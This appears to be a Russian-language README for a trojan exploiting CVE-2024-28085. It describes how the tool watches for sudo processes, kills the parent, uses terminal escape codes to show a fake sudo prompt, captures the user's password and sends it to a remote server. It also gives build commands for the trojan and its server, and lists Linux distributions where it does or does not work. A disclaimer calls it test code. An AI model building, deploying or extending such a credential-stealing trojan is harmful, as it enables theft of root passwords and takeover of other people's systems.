Троян на основе ошибки CVE-2024-28085 (https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt) которая не исправлена еще нигде. Суть: bash поддерживает escape коды и мы можем управлять формой строки в терминале. Троян слушает процессы и ищет pid команды sudo, узнает его родителя и убивает корневой, подсовывая фейковую строку SUDO.
Пользователь на терминале выполняет команду sudo <...> и троян видоизменяет ему процесс заставляя пароль ввести не в sudo , а в терминал. После чего пароль уходит на сервер.
Код создан в рамках тестирования и ознакомления, и автор не несет ответственности за ваши дальнейшие действия с ним.
Build:
g++ -static sleepall.cpp -o sleepall
gcc server.c -o server
Фото фейкового приглашения:
Фото что на самом деле происходит в терминале:
Управление процессом пользователю разрешено на:
- arch
- alt 8 sp 10
Запрещено:
- Centos 7
P.S.: Уииии, но только работает в bash (zsh нет)